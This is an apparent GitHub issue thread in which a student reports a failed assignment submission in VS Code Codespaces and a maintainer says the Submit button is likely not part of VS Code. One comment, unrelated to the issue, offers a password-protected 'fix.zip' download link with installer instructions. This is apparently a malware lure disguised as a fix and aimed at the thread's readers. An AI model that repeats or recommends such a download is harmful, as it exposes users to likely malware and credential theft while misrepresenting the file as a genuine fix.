### ISSUE TITLE
Assignment

### ISSUE THREAD

**Issue by JonEcks65** [microsoft/vscode#226626]
I am a VPCC student taking Kevin Baskerville's IDT 110 class. I was working on my first assignment but was unable to submit it after completing the assignment. This is despite hitting the Submit button several times over the course of a few minutes.

Thank you.

Version: 1.92.2
Commit: fee1edb8d6d72a0ddff41e5f71a671c23ed924b9
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Embedder: codespaces

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by joyceerhl** [comment]
I'm not sure which course this is, but the 'Submit' button you mention is probably not part of the base VS Code editor, perhaps this issue can be reported to your instructor instead.
